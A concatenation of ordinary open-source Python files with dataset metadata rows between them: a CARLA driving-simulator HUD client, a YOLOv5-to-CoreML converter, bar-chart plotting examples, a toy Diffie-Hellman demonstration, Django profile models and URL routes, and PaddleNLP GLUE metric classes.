('Throttle:', orig_control.throttle, 0.0, 1.0, restricted_control.throttle),
('Steer:', orig_control.steer, -1.0, 1.0, restricted_control.steer, allowed_steering_ranges),
('Brake:', orig_control.brake, 0.0, 1.0, restricted_control.brake)]
self._info_text += [
('Reverse:', c.reverse),
'']
def toggle_info(self):
self._show_info = not self._show_info
def notification(self, text, seconds=2.0):
self._notifications.set_text(text, seconds=seconds)
def error(self, text):
self._notifications.set_text('Error: %s' % text, (255, 0, 0))
def render(self, display):
if self._show_info:
info_surface = pygame.Surface((220, self.dim[1]))
info_surface.set_alpha(100)
display.blit(info_surface, (0, 0))
v_offset = 4
bar_h_offset = 100
bar_width = 106
for item in self._info_text:
text_color = (255, 255, 255)
if v_offset + 18 > self.dim[1]:
break
if isinstance(item, list):
if len(item) > 1:
points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)]
pygame.draw.lines(display, (255, 136, 0), False, points, 2)
item = None
v_offset += 18
elif isinstance(item, tuple):
if isinstance(item[1], bool):
rect = pygame.Rect((bar_h_offset, v_offset + 2), (10, 10))
pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)
else:
# draw allowed steering ranges
if len(item) == 6 and item[2] < 0.0:
for steering_range in item[5]:
starting_value = min(steering_range[0], steering_range[1])
length = (max(steering_range[0], steering_range[1]) -
min(steering_range[0], steering_range[1])) / 2
rect = pygame.Rect(
(bar_h_offset + (starting_value + 1) * (bar_width / 2), v_offset + 2), (length * bar_width, 14))
pygame.draw.rect(display, (0, 255, 0), rect)
# draw border
rect_border = pygame.Rect((bar_h_offset, v_offset + 2), (bar_width, 14))
pygame.draw.rect(display, (255, 255, 255), rect_border, 1)
# draw value / restricted value
input_value_rect_fill = 0
if len(item) >= 5:
if item[1] != item[4]:
input_value_rect_fill = 1
f = (item[4] - item[2]) / (item[3] - item[2])
if item[2] < 0.0:
rect = pygame.Rect(
(bar_h_offset + 1 + f * (bar_width - 6), v_offset + 3), (12, 12))
else:
rect = pygame.Rect((bar_h_offset + 1, v_offset + 3), (f * bar_width, 12))
pygame.draw.rect(display, (255, 0, 0), rect)
f = (item[1] - item[2]) / (item[3] - item[2])
rect = None
if item[2] < 0.0:
rect = pygame.Rect((bar_h_offset + 2 + f * (bar_width - 14), v_offset + 4), (10, 10))
else:
if item[1] != 0:
rect = pygame.Rect((bar_h_offset + 2, v_offset + 4), (f * (bar_width - 4), 10))
if rect:
pygame.draw.rect(display, (255, 255, 255), rect, input_value_rect_fill)
item = item[0]
if item: # At this point has to be a str.
surface = self._font_mono.render(item, True, text_color)
display.blit(surface, (8, v_offset))
v_offset += 18
self.rss_state_visualizer.render(display, v_offset)
self._notifications.render(display)
self.help.render(display)
# ==============================================================================
# -- FadingText ----------------------------------------------------------------
# ==============================================================================
class FadingText(object):
def __init__(self, font, dim, pos):
self.font = font
self.dim = dim
self.pos = pos
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
def set_text(self, text, color=(255, 255, 255), seconds=2.0):
text_texture = self.font.render(text, True, color)
self.surface = pygame.Surface(self.dim)
self.seconds_left = seconds
self.surface.fill((0, 0, 0, 0))
self.surface.blit(text_texture, (10, 11))
def tick(self, clock):
delta_seconds = 1e-3 * clock.get_time()
self.seconds_left = max(0.0, self.seconds_left - delta_seconds)
self.surface.set_alpha(500.0 * self.seconds_left)
def render(self, display):
display.blit(self.surface, self.pos)
# ==============================================================================
# -- HelpText ------------------------------------------------------------------
# ==============================================================================
class HelpText(object):
"""Helper class to handle text output using pygame"""
def __init__(self, font, width, height):
lines = __doc__.split('\n')
self.font = font
self.line_space = 18
self.dim = (780, len(lines) * self.line_space + 12)
self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
self.surface.fill((0, 0, 0, 0))
for n, line in enumerate(lines):
text_texture = self.font.render(line, True, (255, 255, 255))
self.surface.blit(text_texture, (22, n * self.line_space))
self._render = False
self.surface.set_alpha(220)
def toggle(self):
self._render = not self._render
def render(self, display):
if self._render:
display.blit(self.surface, self.pos)
# ==============================================================================
# -- game_loop() ---------------------------------------------------------------
# ==============================================================================
def game_loop(args):
pygame.init()
pygame.font.init()
world = None
try:
client = carla.Client(args.host, args.port)
client.set_timeout(2.0)
display = pygame.display.set_mode(
(args.width, args.height),
pygame.HWSURFACE | pygame.DOUBLEBUF)
world = World(client.get_world(), args)
controller = VehicleControl(world, args.autopilot)
clock = pygame.time.Clock()
while True:
clock.tick_busy_loop(60)
if controller.parse_events(world, clock):
return
world.tick(clock)
world.render(display)
controller.render(display)
pygame.display.flip()
finally:
if world is not None:
print('Destroying the world...')
world.destroy()
print('Destroyed!')
pygame.quit()
# ==============================================================================
# -- main() --------------------------------------------------------------------
# ==============================================================================
def main():
argparser = argparse.ArgumentParser(
description='CARLA Manual Control Client RSS')
argparser.add_argument(
'-v', '--verbose',
action='store_true',
dest='debug',
help='print debug information')
argparser.add_argument(
'--host',
metavar='H',
default='127.0.0.1',
help='IP of the host server (default: 127.0.0.1)')
argparser.add_argument(
'-p', '--port',
metavar='P',
default=2000,
type=int,
help='TCP port to listen to (default: 2000)')
argparser.add_argument(
'-a', '--autopilot',
action='store_true',
help='enable autopilot')
argparser.add_argument(
'--res',
metavar='WIDTHxHEIGHT',
default='1280x720',
help='window resolution (default: 1280x720)')
argparser.add_argument(
'--filter',
metavar='PATTERN',
default='vehicle.*',
help='actor filter (default: "vehicle.*")')
argparser.add_argument(
'--rolename',
metavar='NAME',
default='hero',
help='actor role name (default: "hero")')
argparser.add_argument(
'--externalActor',
action='store_true',
help='attaches to externally created actor by role name')
args = argparser.parse_args()
args.width, args.height = [int(x) for x in args.res.split('x')]
log_level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)
logging.info('listening to server %s:%s', args.host, args.port)
print(__doc__)
signal.signal(signal.SIGINT, VehicleControl.signal_handler)
try:
game_loop(args)
except KeyboardInterrupt:
print('\nCancelled by user. Bye!')
if __name__ == '__main__':
main()
| 42.245734 | 166 | 0.544595 |
6b5102122690693b3c654ceed20af7dcc21c36eb | 2,603 | py | Python | yolov5-coreml-tflite-converter/coreml/convert.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null | yolov5-coreml-tflite-converter/coreml/convert.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null | yolov5-coreml-tflite-converter/coreml/convert.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null |
# Copyright (C) 2021 DB Systel GmbH.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
########
# Copyright (C) 2021 SBB
#
# Modification statement in accordance with the Apache 2.0 license:
# This code was modified by Ferdinand Niedermann for SBB in 2021.
# The modifications are NOT published under the Apache 2.0 license.
########
from argparse import ArgumentParser
from constants import DEFAULT_MODEL_OUTPUT_DIR, DEFAULT_COREML_NAME, DEFAULT_INPUT_RESOLUTION, \
DEFAULT_QUANTIZATION_TYPE
from coreml_converter.pytorch_to_coreml_converter import PytorchToCoreMLConverter
def main():
parser = ArgumentParser()
parser.add_argument('--model', type=str, dest="model_input_path", required=True,
help=f"The path to yolov5 model.")
parser.add_argument('--out', type=str, dest="model_output_directory", default=DEFAULT_MODEL_OUTPUT_DIR,
help=f"The path to the directory in which to save the converted model. Default: {DEFAULT_MODEL_OUTPUT_DIR}")
parser.add_argument('--output-name', type=str, dest="model_output_name",
default=DEFAULT_COREML_NAME, help=f'The model output name. Default: {DEFAULT_COREML_NAME}')
parser.add_argument('--input-resolution', type=int, dest="input_resolution", default=DEFAULT_INPUT_RESOLUTION,
help=f'The resolution of the input images, e.g. {DEFAULT_INPUT_RESOLUTION} means input resolution is {DEFAULT_INPUT_RESOLUTION}x{DEFAULT_INPUT_RESOLUTION}. Default: {DEFAULT_INPUT_RESOLUTION}') # height, width
parser.add_argument('--quantize-model', nargs='+', dest="quantization_types", default=[DEFAULT_QUANTIZATION_TYPE],
help=f"Quantization: 'int8', 'float16' or 'float32' for no quantization. Default: [{DEFAULT_QUANTIZATION_TYPE}]")
opt = parser.parse_args()
converter = PytorchToCoreMLConverter(opt.model_input_path, opt.model_output_directory, opt.model_output_name,
opt.quantization_types, opt.input_resolution)
converter.convert()
if __name__ == '__main__':
main()
| 51.039216 | 234 | 0.726469 |
6b56dbb74b79b7a2d6738dd0d5829d84d280de45 | 3,099 | py | Python | src/bar-charts/bars.py | Ellon-M/visualizations | 5a42c213ea8fd0597e2035778d9ae6460eb9e821 | ["MIT"] | null | null | null | src/bar-charts/bars.py | Ellon-M/visualizations | 5a42c213ea8fd0597e2035778d9ae6460eb9e821 | ["MIT"] | null | null | null | src/bar-charts/bars.py | Ellon-M/visualizations | 5a42c213ea8fd0597e2035778d9ae6460eb9e821 | ["MIT"] | null | null | null |
# Bar chart
# A graph that represents categories of data with rectangular bars whose
# lengths (or heights) are proportional to the values they represent.
# Can be vertical or horizontal. Can also be grouped.

# The snippets below assume the pandas dataframes (wrestling_count,
# winter_games_gold_fs, gymnists_fn, gymnists_fn_m, gymnists_fn_w)
# have already been prepared.
import numpy as np
import matplotlib.pyplot as plt
import plotly.express as px
import plotly.graph_objects as go

# matplotlib
fig, ax = plt.subplots(1, figsize=(24,14))
plt.bar(wrestling_count.index, wrestling_count.ID, width=0.9, color='xkcd:plum', edgecolor='ivory', linewidth=0, hatch='-')
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
plt.title('\nHUNGARIAN WRESTLERS\n', fontsize=55, loc='left')
ax.tick_params(axis='x', size=8, labelsize=26)
ax.tick_params(axis='y', size=8, labelsize=26)
fig.show()
# plotly of the above
fig = px.bar(
wrestling_count,
x='Games',
y='ID',
labels={'index':'Games'},
title='HUNGARIAN WRESTLERS',
text="ID",
color="ID",
template = "plotly_dark",
)
fig.update_traces(textfont_size=12, textangle=0, textposition="outside", cliponaxis=False)
fig.show()
# horizontal bars
y = np.array(winter_games_gold_fs['Games'])
x = np.array(winter_games_gold_fs['Age'])
fig, ax = plt.subplots(1, figsize=(24,15))
ax.barh(y, x, color='xkcd:darkblue', edgecolor='ivory', linewidth=0, hatch='-')
ax.set_yticks(y, labels=winter_games_gold_fs['Games'], fontsize=20)
ax.invert_yaxis()
ax.set_xlabel('Age', fontsize=35)
ax.set_title("\nFREESTYLE SKIER'S AGES -\nGOLD MEDALISTS\n", fontsize=44, loc='left')
ax.tick_params(axis='x', labelsize=30)
ax.tick_params(axis='y', labelsize=30)
plt.show()
# plotly of the above
fig = px.bar(
winter_games_gold_fs,
x='Age',
y='Games',
title="FREESTYLE SKIER'S AGES - GOLD MEDALISTS",
text="Age",
color="Age",
color_continuous_scale='Bluered_r',
template = "plotly_dark",
orientation="h"
)
fig.update_traces(textfont_size=12, textangle=0, textposition="inside", cliponaxis=False)
fig.show()
# grouped bars
fig, ax = plt.subplots(figsize = (30,20))
width = 0.4
labels = gymnists_fn.Year.unique()
label_locations = np.arange(len(gymnists_fn.Games.unique()))
y_m = np.array(gymnists_fn_m.ID)
y_w = np.array(gymnists_fn_w.ID)
semi_bar_m = ax.bar(label_locations-width/2, y_m, width, label="M", color='xkcd:brown')
semi_bar_w = ax.bar(label_locations+width/2, y_w, width, label="F", color='purple')
ax.set_ylabel('Athlete Count', fontsize=30)
ax.set_title('\nFRENCH GYMNASTS FROM 1952 \n', fontsize=46, loc='left')
ax.set_xticks(label_locations, labels, fontsize=30)
ax.tick_params(axis='y', labelsize=26)
ax.legend(prop={'size': 36}, shadow=True)
ax.bar_label(semi_bar_m, padding=3, fontsize=24)
ax.bar_label(semi_bar_w, padding=3, fontsize=24)
plt.show()
# plotly of the above
# done with graph objects
fig = go.Figure()
fig.add_trace(go.Bar(
x=labels,
y= y_m,
name='Male',
marker_color='saddlebrown'
))
fig.add_trace(go.Bar(
x=labels,
y=y_w,
name='Female',
marker_color='lightsalmon'
))
# Here we modify the tickangle of the xaxis, resulting in rotated labels.
fig.update_layout(barmode='group', xaxis_tickangle=-45, font=dict(size=18), title="FRENCH GYMNASTS FROM 1952")
fig.show()
| 27.918919 | 123 | 0.709584 |
6b85f4abd3aced7b088690f1385a31fbba845a96 | 811 | py | Python | crypto/diffie_hellman/example.py | yujungcheng/algorithm_and_data_structure | 3742238227067217b82bf35ca3a968db4375f3c9 | ["Apache-2.0"] | null | null | null | crypto/diffie_hellman/example.py | yujungcheng/algorithm_and_data_structure | 3742238227067217b82bf35ca3a968db4375f3c9 | ["Apache-2.0"] | null | null | null | crypto/diffie_hellman/example.py | yujungcheng/algorithm_and_data_structure | 3742238227067217b82bf35ca3a968db4375f3c9 | ["Apache-2.0"] | 1 | 2020-04-16T01:17:04.000Z | 2020-04-16T01:17:04.000Z |
#!/usr/bin/python3
# ref: https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange#Cryptographic_explanation
# ref: https://en.wikipedia.org/wiki/RSA_(cryptosystem)
shared_modulus = 23
shared_base = 5
print("shared modulus: %s" % shared_modulus)
print("shared base: %s" % shared_base)
print("-"*40)
alice_secret = 4
bob_secret = 3
print("alice's secret key: %s" % alice_secret)
print("bob's secret key: %s" % bob_secret)
print("-"*40)
A = (shared_base**alice_secret) % shared_modulus
B = (shared_base**bob_secret) % shared_modulus
print("alice's public key: %s" % A)
print("bob's public key: %s" % B)
print("-"*40)
alice_s = (B**alice_secret) % shared_modulus
bob_s = (A**bob_secret) % shared_modulus
print("alice's shared secret key: %s" % alice_s)
print("bob's shared secret key: %s" % bob_s)
| 27.033333 | 98 | 0.711467 |
d4538d814fee30600bb7a5ca2ff2e9bd855cf0fc | 2,361 | py | Python | apps/profile/models.py | IT-PM-OpenAdaptronik/Webapp | c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4 | ["MIT"] | 2 | 2017-12-17T21:28:22.000Z | 2018-02-02T14:44:58.000Z | apps/profile/models.py | IT-PM-OpenAdaptronik/Webapp | c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4 | ["MIT"] | 118 | 2017-10-31T13:45:09.000Z | 2018-02-24T20:51:42.000Z | apps/profile/models.py | OpenAdaptronik/Rattler | c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4 | ["MIT"] | null | null | null |
import os
from django.db import models
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth import get_user_model
# Create your models here.
class Profile(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, verbose_name=_('user') )
company = models.CharField(_('company'),max_length=255, null=True, blank=True)
info = models.CharField(_('info'),max_length=255, null=True, blank=True)
expert = models.BooleanField(_('expert'),default=False)
visibility_mail = models.BooleanField(_('visibility of mail adress'),default=False)
visibility_company = models.BooleanField(_('visibility of company'),default=False)
visibility_info = models.BooleanField(_('visibility of information'),default=False)
visibility_first_name = models.BooleanField(_('visibility of first name'),default=False)
visibility_last_name = models.BooleanField(_('visibility of last name'), default=False)
max_projects = models.IntegerField(_('maximum number of projects'),default=5)
max_datarows = models.IntegerField(_('maximum number of datarows'), default=100000)
created = models.DateTimeField(_('created'),auto_now_add=True)
updated = models.DateTimeField(_('updated'),auto_now=True)
def __str__(self):
return _('%(username)s profile') % {'username': self.user.username}
def profile_image_path(instance, filename):
return 'profile/%s%s' % (instance.profile.id, os.path.splitext(filename)[1])
class ProfileImage(models.Model):
profile = models.OneToOneField(Profile, on_delete=models.CASCADE, verbose_name=_('profile'))
path = models.ImageField(_('path'),upload_to=profile_image_path)
created = models.DateTimeField(_('created'),auto_now_add=True)
updated = models.DateTimeField(_('updated'),auto_now=True)
class Meta:
verbose_name = _('profile image')
verbose_name_plural = _('profile images')
@receiver(post_save, sender=get_user_model())
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=get_user_model())
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
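# Usage sketch (hypothetical shell session): creating a user triggers
# create_user_profile via the post_save signal above, so the profile
# exists immediately:
#   user = get_user_model().objects.create_user('alice', password='secret')
#   user.profile  # created automatically by create_user_profile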
| 42.927273 | 108 | 0.750953 |
d47bd2d6d94f921e95f859f1b197ebbf9fa00b80 | 744 | py | Python | my-cs/intern/java_details/java_sort_selection_details/partioners/__init__.py | zaqwes8811/cs-courses | aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2 | ["Apache-2.0"] | null | null | null | my-cs/intern/java_details/java_sort_selection_details/partioners/__init__.py | zaqwes8811/cs-courses | aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2 | ["Apache-2.0"] | null | null | null | my-cs/intern/java_details/java_sort_selection_details/partioners/__init__.py | zaqwes8811/cs-courses | aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2 | ["Apache-2.0"] | null | null | null |
# coding: utf-8
class Partitioner(object):
    @staticmethod
    def partition(array):
        """
        Take the first element as the pivot.
        """
        IDX_PIVOT = 0  # Picking the last element instead might make
                       # working with the indices simpler.
        pivot_value = array[IDX_PIVOT]
        i = 1
        for j, value in enumerate(array):
            # j scans the whole array, but we skip the first element
            if j == 0:
                continue
            if pivot_value > array[j]:
                swap(array, j, i)
                i += 1
        # Last swap: move the pivot into its final position
        swap(array, IDX_PIVOT, i - 1)
        return i  # one past the pivot's final position (pivot sits at i - 1)
def swap(array, i, j):
a, b = i, j
array[b], array[a] = array[a], array[b]
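if __name__ == '__main__':
    # Quick illustrative check: after partitioning, every element left
    # of the pivot's final slot is smaller than the pivot value.
    data = [5, 2, 8, 1, 9, 3]
    boundary = Partitioner.partition(data)
    print(data, boundary)  # -> [3, 2, 1, 5, 9, 8] 4 (pivot 5 at index 3)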
| 24 | 59 | 0.517473 |
d85b7bdeee038a84450fe5c219c6e1818e24d8af | 1,444 | py | Python | rating/responsive_layout.py | thegreenwebfoundation/green-spider | 68f22886178bbe5b476a4591a6812ee25cb5651b | ["Apache-2.0"] | 19 | 2018-04-20T11:03:41.000Z | 2022-01-12T20:58:56.000Z | rating/responsive_layout.py | thegreenwebfoundation/green-spider | 68f22886178bbe5b476a4591a6812ee25cb5651b | ["Apache-2.0"] | 160 | 2018-04-05T16:12:59.000Z | 2022-03-01T13:01:27.000Z | rating/responsive_layout.py | thegreenwebfoundation/green-spider | 68f22886178bbe5b476a4591a6812ee25cb5651b | ["Apache-2.0"] | 8 | 2018-11-05T13:07:57.000Z | 2021-06-11T11:46:43.000Z |
"""
This gives a score if the site's minimal document width during checks
was smaller than or equal to the minimal viewport size tested.
"""
from rating.abstract_rater import AbstractRater
class Rater(AbstractRater):
rating_type = 'boolean'
default_value = False
depends_on_checks = ['load_in_browser']
max_score = 1
def __init__(self, check_results):
super().__init__(check_results)
def rate(self):
value = self.default_value
score = 0
for url in self.check_results['load_in_browser']:
if 'min_document_width' not in self.check_results['load_in_browser'][url]:
continue
if 'sizes' not in self.check_results['load_in_browser'][url]:
continue
if self.check_results['load_in_browser'][url]['sizes'] == []:
continue
if self.check_results['load_in_browser'][url]['sizes'] is None:
continue
if (self.check_results['load_in_browser'][url]['min_document_width'] <=
self.check_results['load_in_browser'][url]['sizes'][0]['viewport_width']):
value = True
score = self.max_score
# we use the first URL found here
break
return {
'type': self.rating_type,
'value': value,
'score': score,
'max_score': self.max_score,
}
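if __name__ == '__main__':
    # Illustrative input only: the field names mirror those read in
    # rate() above, the concrete values are made up, and running this
    # standalone assumes the rating package is importable.
    sample_results = {
        'load_in_browser': {
            'https://example.org/': {
                'min_document_width': 360,
                'sizes': [{'viewport_width': 360}],
            }
        }
    }
    print(Rater(sample_results).rate())  # -> value True, score 1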
| 31.391304 | 90 | 0.587258 |
5ad862a436266f8215754ad931c6e1e64b1aef34 | 865 | py | Python | frappe-bench/apps/erpnext/erpnext/patches/v8_0/rename_items_in_status_field_of_material_request.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | ["MIT"] | 1 | 2021-04-29T14:55:29.000Z | 2021-04-29T14:55:29.000Z | frappe-bench/apps/erpnext/erpnext/patches/v8_0/rename_items_in_status_field_of_material_request.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | ["MIT"] | null | null | null | frappe-bench/apps/erpnext/erpnext/patches/v8_0/rename_items_in_status_field_of_material_request.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | ["MIT"] | 1 | 2021-04-29T14:39:01.000Z | 2021-04-29T14:39:01.000Z |
from __future__ import unicode_literals
import frappe
def execute():
frappe.db.sql(
"""
UPDATE `tabMaterial Request`
SET status = CASE
WHEN docstatus = 2 THEN 'Cancelled'
WHEN docstatus = 0 THEN 'Draft'
ELSE CASE
WHEN status = 'Stopped' THEN 'Stopped'
WHEN status != 'Stopped' AND per_ordered = 0 THEN 'Pending'
WHEN per_ordered < 100 AND per_ordered > 0 AND status != 'Stopped'
THEN 'Partially Ordered'
WHEN per_ordered = 100 AND material_request_type = 'Purchase'
AND status != 'Stopped' THEN 'Ordered'
WHEN per_ordered = 100 AND material_request_type = 'Material Transfer'
AND status != 'Stopped' THEN 'Transferred'
WHEN per_ordered = 100 AND material_request_type = 'Material Issue'
AND status != 'Stopped' THEN 'Issued'
END
END
"""
)
| 34.6 | 78 | 0.643931 |
8505fd6ee76213eef44b6d8bb755c33c9a3f134e | 2,750 | py | Python | Implementierung/ResearchEnvironment/AuthorizationManagement/urls.py | Sashks/PSE | ae2d8133a85563c33583f15b9ba76a3a2bf0c762 | ["MIT"] | null | null | null | Implementierung/ResearchEnvironment/AuthorizationManagement/urls.py | Sashks/PSE | ae2d8133a85563c33583f15b9ba76a3a2bf0c762 | ["MIT"] | null | null | null | Implementierung/ResearchEnvironment/AuthorizationManagement/urls.py | Sashks/PSE | ae2d8133a85563c33583f15b9ba76a3a2bf0c762 | ["MIT"] | null | null | null |
from django.urls import path
from AuthorizationManagement import views
from django.urls.conf import re_path
from .admin import resource_manager
from .admin import user_manager
from .views import *
urlpatterns = [
path('', views.homeView, name='home'),
re_path(r'^resource-manager/', resource_manager.urls),
re_path(r'^user-manager/', user_manager.urls),
    # This section should stay commented out for now, so that we can keep
    # working with the /admin interface from django; that means views.foo
    # should not be used for now.
re_path(r'^profile/', views.ProfileView.as_view(), name = 'profile'),
re_path(r'^my-resources/$', views.MyResourcesView.as_view(), name = 'my resources' ),
# re_path(r'^profile/handle/$', views.ChosenRequestView.as_view(), name = 'handle request'),
re_path(r'^handle/(?P<pk>\d+)$', views.ChosenRequestsView.as_view(), name='handle request'),
re_path(r'^my-resources/(?P<resourceid>\d+)-edit-users-permissions/$', views.PermissionEditingView.as_view(), name='edit permissions'),
# re_path(r'^profile/resources/add_new_resource/$', views.index),
# re_path(r'^profile/resources/(?P<resourceID>\w+)_send_deletion_request/$', views.foo),
# re_path(r'^profile/resources/(?P<resourceID>\w+)_edit_users_permissions/reason_for_change/$', views.foo),
#
# re_path(r'^login/$', views.index),
#
# re_path(r'^manage_users/$', views.index),
# re_path(r'^manage_users/block_user/$', views.index),
# re_path(r'^manage_users/delete_user/$', views.index),
# re_path(r'^manage_users/(?P<userID>\w+)_permissions_for_resources/$', views.foo),
# re_path(r'^manage_users/(?P<userID>\w+)_permissions_for_resources/reason_for_change/$', views.foo),
#
# re_path(r'^manage_resources/$', views.index),
# re_path(r'^manage_resources/delete_resource/$', views.index),
# re_path(r'^manage_resources/(?P<resourceID>\w+)_permissions_for_users/$', views.foo),
# re_path(r'^manage_resources/(?P<resourceID>\w+)_permissions_for_users/reason_for_change/$', views.foo),
#
re_path(r'^resources-overview/$', views.ResourcesOverview.as_view(), name='resource-overview'),
re_path(r'^resources-overview/search$', views.ResourcesOverviewSearch.as_view(), name='search-resources'),
re_path(r'^resources/\w+\d*\.txt$', views.download, name='download resources'),
re_path(r'^send-access-request/\d*$', views.send_access_request, name='send-access-request'),
re_path(r'^cancel-access-request/\d*$', views.cancel_access_request, name='cancel-access-request')
# re_path(r'^resources_overview/(?P<resourceID>\w+)_send_request/$', views.foo),
#
# re_path(r'^(?P<resourceID>\w+)/$', views.foo),
]
| 48.245614 | 139 | 0.690909 |
850cc4679d74c30a88ccf7b06dc3bb692a8ec0f0
| 24,334 |
py
|
Python
|
paddlenlp/metrics/glue.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
paddlenlp/metrics/glue.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
paddlenlp/metrics/glue.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import math
import warnings
from functools import partial
import numpy as np
import paddle
from paddle.metric import Metric, Accuracy, Precision, Recall
__all__ = ['AccuracyAndF1', 'Mcc', 'PearsonAndSpearman', 'MultiLabelsMetric']
class AccuracyAndF1(Metric):
"""
This class encapsulates Accuracy, Precision, Recall and F1 metric logic,
and `accumulate` function returns accuracy, precision, recall and f1.
    An overview of all metrics can be found in the documentation of `paddle.metric
    <https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/api/paddle/metric/Overview_cn.html>`_.
Args:
topk (int or tuple(int), optional):
Number of top elements to look at for computing accuracy.
Defaults to (1,).
pos_label (int, optional): The positive label for calculating precision
and recall.
Defaults to 1.
name (str, optional):
String name of the metric instance. Defaults to 'acc_and_f1'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import AccuracyAndF1
x = paddle.to_tensor([[0.1, 0.9], [0.5, 0.5], [0.6, 0.4], [0.7, 0.3]])
y = paddle.to_tensor([[1], [0], [1], [1]])
m = AccuracyAndF1()
correct = m.compute(x, y)
m.update(correct)
res = m.accumulate()
print(res) # (0.5, 0.5, 0.3333333333333333, 0.4, 0.45)
"""
def __init__(self,
topk=(1, ),
pos_label=1,
name='acc_and_f1',
*args,
**kwargs):
super(AccuracyAndF1, self).__init__(*args, **kwargs)
self.topk = topk
self.pos_label = pos_label
self._name = name
self.acc = Accuracy(self.topk, *args, **kwargs)
self.precision = Precision(*args, **kwargs)
self.recall = Recall(*args, **kwargs)
self.reset()
def compute(self, pred, label, *args):
"""
Accepts network's output and the labels, and calculates the top-k
(maximum value in topk) indices for accuracy.
Args:
pred (Tensor):
Predicted tensor, and its dtype is float32 or float64, and
has a shape of [batch_size, num_classes].
label (Tensor):
                The ground truth tensor, and its dtype is int64, and has a
shape of [batch_size, 1] or [batch_size, num_classes] in one
hot representation.
Returns:
Tensor: Correct mask, each element indicates whether the prediction
            equals the label. It's a tensor with a data type of float32 and
has a shape of [batch_size, topk].
"""
self.label = label
self.preds_pos = paddle.nn.functional.softmax(pred)[:, self.pos_label]
return self.acc.compute(pred, label)
def update(self, correct, *args):
"""
Updates the metrics states (accuracy, precision and recall), in order to
calculate accumulated accuracy, precision and recall of all instances.
Args:
correct (Tensor):
Correct mask for calculating accuracy, and it's a tensor with
shape [batch_size, topk] and has a dtype of
float32.
"""
self.acc.update(correct)
self.precision.update(self.preds_pos, self.label)
self.recall.update(self.preds_pos, self.label)
def accumulate(self):
"""
Calculates and returns the accumulated metric.
Returns:
tuple: The accumulated metric. A tuple of shape (acc, precision,
recall, f1, average_of_acc_and_f1)
With the fields:
- `acc` (numpy.float64):
The accumulated accuracy.
- `precision` (numpy.float64):
The accumulated precision.
- `recall` (numpy.float64):
The accumulated recall.
- `f1` (numpy.float64):
The accumulated f1.
- `average_of_acc_and_f1` (numpy.float64):
The average of accumulated accuracy and f1.
"""
acc = self.acc.accumulate()
precision = self.precision.accumulate()
recall = self.recall.accumulate()
if precision == 0.0 or recall == 0.0:
f1 = 0.0
else:
# 1/f1 = 1/2 * (1/precision + 1/recall)
f1 = (2 * precision * recall) / (precision + recall)
return (
acc,
precision,
recall,
f1,
(acc + f1) / 2,
)
def reset(self):
"""
Resets all metric states.
"""
self.acc.reset()
self.precision.reset()
self.recall.reset()
self.label = None
self.preds_pos = None
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
class Mcc(Metric):
"""
This class calculates `Matthews correlation coefficient <https://en.wikipedia.org/wiki/Matthews_correlation_coefficient>`_ .
Args:
name (str, optional):
String name of the metric instance. Defaults to 'mcc'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import Mcc
x = paddle.to_tensor([[-0.1, 0.12], [-0.23, 0.23], [-0.32, 0.21], [-0.13, 0.23]])
y = paddle.to_tensor([[1], [0], [1], [1]])
m = Mcc()
(preds, label) = m.compute(x, y)
m.update((preds, label))
res = m.accumulate()
print(res) # (0.0,)
"""
